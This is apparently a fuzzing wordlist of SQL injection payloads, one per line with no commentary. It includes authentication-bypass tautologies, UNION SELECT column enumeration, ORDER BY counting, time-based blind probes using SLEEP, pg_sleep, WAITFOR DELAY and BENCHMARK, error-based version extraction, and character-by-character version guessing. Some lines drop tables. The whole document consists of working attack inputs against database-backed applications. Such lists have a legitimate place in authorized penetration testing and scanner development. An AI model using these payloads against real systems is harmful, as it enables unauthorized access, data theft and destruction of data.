'
"
1'
1"
1' OR '1'='1
1" OR "1"="1
1' OR '1'='1'--
1" OR "1"="1"--
1' OR '1'='1'#
1" OR "1"="1"#
1' UNION SELECT NULL--
1" UNION SELECT NULL--
1' AND '1'='2
1" AND "1"="2
1' WAITFOR DELAY '0:0:5'--
1'; WAITFOR DELAY '0:0:5'--
1' AND (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES)>0--
1' AND (SELECT COUNT(*) FROM sysobjects)>0--
1' AND (SELECT COUNT(*) FROM mysql.user)>0--
1' OR SLEEP(5)--
1' OR pg_sleep(5)--
1' OR BENCHMARK(5000000,MD5(1))--
1' OR (SELECT * FROM (SELECT(SLEEP(5)))test)--
1'; DROP TABLE test--
1"; DROP TABLE test--
1' OR 1=1--
1" OR 1=1--
admin'--
admin"--
' OR '1'='1' /*
" OR "1"="1" /*
' OR 1=1 /*
" OR 1=1 /*
' OR 'a'='a
" OR "a"="a
' OR ''='
" OR ""="
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3--
1' ORDER BY 4--
1' ORDER BY 5--
1' GROUP BY 1--
1' GROUP BY 2--
1' GROUP BY 3--
1' GROUP BY 4--
1' GROUP BY 5--
1' HAVING 1=1--
1' HAVING 1=2--
1' UNION SELECT 1--
1' UNION SELECT 1,2--
1' UNION SELECT 1,2,3--
1' UNION SELECT 1,2,3,4--
1' UNION SELECT 1,2,3,4,5--
1' UNION ALL SELECT NULL--
1' UNION ALL SELECT NULL,NULL--
1' UNION ALL SELECT NULL,NULL,NULL--
1' UNION ALL SELECT NULL,NULL,NULL,NULL--
1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL--
1' AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))--
1' AND UPDATEXML(1,CONCAT(0x7e,VERSION(),0x7e),1)--
1' AND (SELECT * FROM (SELECT COUNT(*),CONCAT(VERSION(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)--
1' OR (SELECT SUBSTRING(@@version,1,1))='5'--
1' OR (SELECT SUBSTRING(@@version,1,1))='8'--
1' OR (SELECT SUBSTRING(@@version,1,1))='1'--
1' OR (SELECT SUBSTRING(@@version,1,1))='9'--
1' OR (SELECT SUBSTRING(@@version,1,1))='2'--
1' OR (SELECT SUBSTRING(@@version,1,1))='3'--
1' OR (SELECT SUBSTRING(@@version,1,1))='4'--
1' OR (SELECT SUBSTRING(@@version,1,1))='6'--
1' OR (SELECT SUBSTRING(@@version,1,1))='7'--
1' OR (SELECT SUBSTRING(VERSION(),1,1))='5'--
1' OR (SELECT SUBSTRING(VERSION(),1,1))='8'--
1' OR (SELECT SUBSTRING(VERSION(),1,1))='1'--
1' OR (SELECT SUBSTRING(VERSION(),1,1))='9'--
1' OR (SELECT SUBSTRING(VERSION(),1,1))='2'--
1' OR (SELECT SUBSTRING(VERSION(),1,1))='3'--
1' OR (SELECT SUBSTRING(VERSION(),1,1))='4'--
1' OR (SELECT SUBSTRING(VERSION(),1,1))='6'--
1' OR (SELECT SUBSTRING(VERSION(),1,1))='7'--
1' OR ASCII(SUBSTRING(@@version,1,1))>50--
1' OR ASCII(SUBSTRING(@@version,1,1))>51--
1' OR ASCII(SUBSTRING(@@version,1,1))>52--
1' OR ASCII(SUBSTRING(@@version,1,1))>53--
1' OR ASCII(SUBSTRING(@@version,1,1))>54--
1' OR ASCII(SUBSTRING(@@version,1,1))>55--
1' OR ASCII(SUBSTRING(@@version,1,1))>56--
1' OR ASCII(SUBSTRING(@@version,1,1))>57--
1' OR LENGTH(@@version)>1--
1' OR LENGTH(@@version)>2--
1' OR LENGTH(@@version)>3--
1' OR LENGTH(@@version)>4--
1' OR LENGTH(@@version)>5--
1' OR LENGTH(@@version)>6--
1' OR LENGTH(@@version)>7--
1' OR LENGTH(@@version)>8--
1' OR LENGTH(@@version)>9--
1' OR LENGTH(@@version)>10--
1' OR LENGTH(@@version)>11--
1' OR LENGTH(@@version)>12--
1' OR LENGTH(@@version)>13--
1' OR LENGTH(@@version)>14--
1' OR LENGTH(@@version)>15--
1' OR LENGTH(@@version)>16--
1' OR LENGTH(@@version)>17--
1' OR LENGTH(@@version)>18--
1' OR LENGTH(@@version)>19--
1' OR LENGTH(@@version)>20--
